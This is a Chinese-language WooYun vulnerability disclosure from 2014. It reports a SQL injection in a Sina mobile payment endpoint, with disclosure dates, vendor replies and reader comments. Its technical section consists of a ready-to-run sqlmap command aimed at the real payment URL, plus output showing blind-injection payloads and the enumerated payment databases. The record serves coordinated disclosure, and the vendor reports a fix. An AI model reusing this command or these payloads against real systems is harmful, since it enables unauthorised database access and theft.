当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076093

漏洞标题:新浪无线支付系统SQL注入漏洞之一

相关厂商:新浪

漏洞作者: 猪猪侠

提交时间:2014-09-15 01:34

修复时间:2014-09-15 21:37

公开时间:2014-09-15 21:37

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-15: 细节已通知厂商并且等待厂商处理中
2014-09-15: 厂商已经确认,细节仅向厂商公开
2014-09-15: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

新浪支付系统SQL注入漏洞之一

详细说明:

sqlmap -u "http://pay.mobile.sina.cn/nc/third_pay/third_pay_alipay_get.php?mobile=&fee=3C8i9zDVchc%3D&business_id=309" -p business_id --dbms=mysql --dbs

无线支付1.PNG

漏洞证明:

GET parameter 'business_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 27 HTTP(s) requests:
---
Place: GET
Parameter: business_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: mobile=&fee=3C8i9zDVchc%3D&business_id=309' AND 6247=6247 AND 'JPne'='JPne
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: mobile=&fee=3C8i9zDVchc%3D&business_id=309' AND SLEEP(5) AND 'hSXb'='hSXb
---
[13:24:25] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[13:24:25] [INFO] fetching database names
[13:24:25] [INFO] fetching number of databases
[13:24:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:24:25] [INFO] retrieved: 5
[13:24:27] [INFO] retrieved: information_schema
[13:25:23] [INFO] retrieved: sinapay
[13:25:36] [INFO] retrieved: sinapay_admin
[13:26:07] [INFO] retrieved: sinapay_music
[13:26:43] [INFO] retrieved: test
available databases [5]:
[*] information_schema
[*] sinapay
[*] sinapay_admin
[*] sinapay_music
[*] test

修复方案:

安全转义

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-09-15 09:03

厂商回复:

感谢关注新浪安全,漏洞修复中。

最新状态:

2014-09-15:新浪支付科技有限公司对乌云网站发布的WooYun-2014-76093和WooYun-2014-76094号漏洞的澄清函新浪支付于9月15日得知乌云网站公布了有关新浪支付系统漏洞的WooYun-2014-76093和WooYun-2014-76094号漏洞,公司非常重视,积极的开展自查工作,确认漏洞具体情况、影响范围和造成的影响。根据乌云网站提供的漏洞描述并验证,发现并非新浪支付系统存在的漏洞,此漏洞对新浪支付所经营的第三方支付业务不构成安全威胁和影响。新浪的相关部门已经修复此漏洞,并已公布了具体漏洞细节。非常感谢乌云对互联网安全事业做出的巨大贡献,也非常感谢所有合作伙伴对新浪支付业务的关注。

漏洞评价:

评论

  1. 2014-09-15 01:50 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    必火留名!

  2. 2014-09-15 01:53 | 陌小染 ( 路人 | Rank:8 漏洞数:10 | 我只是个菜鸟,只是在有高手的地方到处飞.)

    前排 下面的来报道!

  3. 2014-09-15 02:15 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)

    刘明 自古二楼出...

  4. 2014-09-15 08:25 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    ccxv

  5. 2014-09-15 08:39 | bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖,不如相濡以沫)

    刘明

  6. 2014-09-15 08:41 | Jn· ( 路人 | Rank:30 漏洞数:14 | 本小菜很可爱,如果不服你TM来打我啊--哎呀...)

    ccxv

  7. 2014-09-15 09:32 | l0u1s ( 路人 | Rank:16 漏洞数:3 | 崇尚自由、开放、共享、简约。)

    超凡猪猪侠

  8. 2014-09-15 09:53 | onlycjeg ( 实习白帽子 | Rank:38 漏洞数:5 | 我就看看,我不说话.)

    膜拜扫描器;

  9. 2014-09-15 10:10 | wkc_2014 ( 普通白帽子 | Rank:164 漏洞数:45 | 2014-)

    超凡猪猪侠

  10. 2014-09-15 10:16 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    上电视了,http://tech.163.com/api/14/0915/09/A662LO8N000915BF.html

  11. 2014-09-15 16:02 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:39 | 道生一,一生二,二生三,三生万物,万物负...)

    一日,晌午,宋江途经东京卞梁县,正当处暑,热气难熬,街上已寥无几人,只听见远处有议论声纷纷传来,一看,不是哪里,正是悦来客栈,宋江走进客栈,找了位置坐下,解下佩刀,帽子往桌上一放,只听众人纷纷议论,宋江便叫住小二,“请问,众人皆议论甚?”小二答道:“客官外地人吧?”,宋江嗯道,“你有所不知,在这卞梁县东街尽头,有一铁匠铺,据说里面的工匠是三国刘氏后裔,练得一身打铁技术,据说能打造世上神器,高太尉闻此人神术,便遣人请他为自己打造一把佩刀,谁知那铁匠居然不从,还推脱说打不出,高太尉得知,火冒三丈,看来此人命不久矣,客官,便是此事。”宋江曰:“敢问此人大名?”小二曰:“小的只知此人姓刘,手拿一把红色兵器,至于是甚,小的就不知道了。”话刚落,宋江起身,放下茶钱,提起佩刀,戴上帽子便走,“客官慢走。”出了客栈的宋江直奔东街,到了铁匠铺,宋江直进入内,只见此人虎背熊腰,背后刺有大虫!高六丈,“此处可造佩刀?”宋江问道,“造佩刀何用?”铁匠问道,“替天行道”宋江低声回答,此人转身一看,说到:“你可是宋江宋大哥?”宋江心想,此人为何识我?说道:“在下便是,敢问英雄大名?”只见铁匠跪了下来,“小弟日夜盼望,有生之年能见你一面,都说你忠义一身,满腔热血,今日得偿所愿,死而无憾!”“英雄请起,在下不敢当。”宋江说着便扶起铁匠,“我听众人议论,你得罪高太尉,此人心狠手辣,英雄恐怕会遭罪,若不介意,随我上梁山一起替天行道?”“我早有此意,今日哥哥相邀,我便随哥哥上山!”宋江又问:“敢问英雄大名?”铁匠说道:“小弟乃三国刘氏后裔,因时事变化,从祖上两代开始变靠打铁为生,小弟姓刘名明,因手持一把大的稀罕火钳,故世人唤我做——— 火 钳 刘 明 !

  12. 2014-09-15 19:25 | izj ( 路人 | Rank:7 漏洞数:3 | 爱老婆)

    每次必看的

  13. 2014-09-15 21:42 | Stardustsky ( 路人 | Rank:4 漏洞数:3 | ……)

    猪哥脱裤子了吗?

  14. 2014-09-15 23:34 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    被网易黑了。。。

  15. 2014-09-16 17:25 | 逗比 ( 路人 | Rank:20 漏洞数:6 | 逗比的年代,诶油我艹)

    猪哥屌

  16. 2014-10-12 16:58 | 窝窝哥 ( 实习白帽子 | Rank:86 漏洞数:29 | 没WB啊啊啊啊!)

    猪哥厉害啊

  17. 2014-12-24 14:37 | kow ( 路人 | Rank:29 漏洞数:4 | 研表究明,汉字的序顺并不定一能影阅响读,...)

    公关还是很注意啊~~